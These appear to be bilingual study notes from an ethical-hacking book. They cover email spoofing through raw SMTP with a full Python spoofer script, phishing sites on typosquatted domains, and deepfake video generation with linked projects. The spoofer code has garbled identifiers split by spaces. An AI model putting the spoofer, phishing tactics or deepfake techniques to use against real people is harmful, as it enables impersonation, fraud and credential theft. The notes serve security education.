Faking Emails
Performing a DNS Lookup of a Mail Server
exam:dig mx gmail.com
an SMTP server that accepts a connection on port 25.
Use netcat on the Kali Linux virtual machine to connect to port 25 on that IP address by running the following command:
Communicating with SMTP
nc -nv 192.168.1.102(邮件服务器IP) 25(SMTP端口)
The server responds with a 354 message, which indicates that it is ready to receive the email.
Writing an Email Spoofer
espoofer.py
import sys, socket
size = 1024
def send Message(smtp Server, port, from Address,
to Address,message):
IP = smtp Server
PORT = int(port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT)) # Open socket on port
print(s.recv(size).decode()) # display response
➊
s.send(b'HELO '+ from Address.split('@')[1].encode() +b'\n')
➋
print(s.recv(size).decode())
# send MAIL FROM:
s.send(b'MAIL FROM:<'+ from Address.encode() + b'>\n')
print(s.recv(size).decode())
# send RCPT TO:
s.send(b'RCPT TO:<'+ to Address.encode() + b'>\n')
print(s.recv(size).decode())
s.send(b"DATA\n") # send DATA
print(s.recv(size).decode())
s.send(message.encode() + b'\n')
➌
s.send(b'\r\n.\r\n')
print(s.recv(size).decode()) # display response
s.send(b'QUIT\n') # send QUIT
print(s.recv(size).decode()) # display response
s.close()
def main(args):
➍
smtp Server = args[1]
port = args[2]
from Address = args[3]
to Address = args[4]
message = args[5]
send Message(smtp Server, port, from Address,
to Address, message)
if __name__ == "__main__":
main(sys.argv)Faking Websites
下载原始页面,用户输入重定向
If you look closely at the URL bar, you’ll notice that the page isn’t
encrypted, as Facebook would normally be, and that the URL is not
facebook.com. Not to worry: hackers have deceptive ways of hiding
this, too. For example, a hacker could register a domain similar to
Facebook’s. I checked the GoDaddy domain search and found that
domains like fecabeok.com or facebvvk.com were still available. A
user would need to look carefully at the URL bar to discover that
they’ve been duped. Would you notice something wrong if you
quickly glanced at https://wwww.fecabeok.com/? We call the act of
using URLs that look like legitimate ones squatting. Tools like
URLCrazy will help you easily identify squatting URLs.
Now you know how to create a fake site. Let’s discuss how to
create fake videos.
深度伪造的两个步骤:
The process has two steps. During the first step, the video is fed
to a key point extraction algorithm, which learns the sparse collection
of points needed to model facial movement in the input video. This
input video is called the driving video, because it will be used to drive
the animation of the picture.
After the key points for each frame are extracted, they’re sent to
a machine learning algorithm that learns how the points move. This
process is called motion detection.
During the second step, the machine learning algorithm warps
the input picture and generates the animated video.
相关伪造项目和库
GitHub - The-Ethical-Hacking-Book/DeepFakeBob(例子)
GitHub - alievk/avatarify-python: Avatars for Zoom, Skype and other video-conferencing apps.